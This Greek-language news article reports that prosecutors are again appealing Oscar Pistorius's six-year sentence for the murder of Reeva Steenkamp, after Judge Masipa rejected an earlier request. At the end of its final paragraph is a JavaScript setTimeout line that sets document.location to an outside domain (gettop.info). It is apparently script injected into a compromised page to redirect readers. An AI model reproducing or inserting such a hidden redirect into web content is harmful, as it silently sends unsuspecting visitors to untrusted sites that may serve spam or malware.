Έφεση από τους Εισαγγελείς κατά της ποινής Πιστόριους

0
8

 

Εκ νέου έφεση θα ασκήσουν εισαγγελείς κατά της εξαετούς ποινής κάθειρξης που επιβλήθηκε στον Όσκαρ Πιστόριους, μετά την αποτυχία παρόμοιας προσφυγής τον προηγούμενο μήνα.

Στις 26 Αυγούστου, η νοτιοαφρικανική δικαιοσύνη απέρριψε αίτημα της εισαγγελίας, η οποία ζητούσε να επιβληθεί νέα ποινή στον Όσκαρ Πιστόριους για τον φόνο της φίλης του Ρίβα Στέενκαμπ.

«Το αίτημα για έφεση απορρίπτεται. Δεν έχω πεισθεί ότι η έφεση αυτή έχει πιθανότητες επιτυχίας και ότι ένα άλλο δικαστήριο θα μπορούσε να καταλήξει σε διαφορετικά συμπεράσματα», ανέφερε στο σκεπτικό της απόφασής της η δικαστής Τοκοζίλε Μασίπα του δικαστηρίου του Γιοχάνεσμπουργκ.

Ο Όσκαρ Πιστόριους καταδικάσθηκε τον Ιούλιο σε δεύτερο βαθμό σε κάθειρξη έξι ετών για τον φόνο της Ρίβα Στέενκαμπ το 2013, ποινή που κρίθηκε πολύ μικρή για το αδίκημα του Παραολυμπιονίκη. Σύμφωνα με το νοτιοαφρικανικό δίκαιο, η έφεση δεν είναι αυτόματη και ο δικαστής που εξέδωσε την ετυμηγορία είναι αυτός που αποφασίζει αν θα γίνει δεκτή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here